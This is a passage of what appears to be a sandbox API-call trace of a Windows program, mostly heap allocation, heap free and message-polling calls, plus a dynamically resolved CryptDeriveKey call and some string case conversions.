dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0207.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.182] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0207.184] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0207.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.184] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.184] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.185] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.185] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.186] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.186] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.186] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.186] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.186] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0207.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24aa008, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0207.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.190] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0207.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0207.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0207.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0207.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.190] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0207.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, 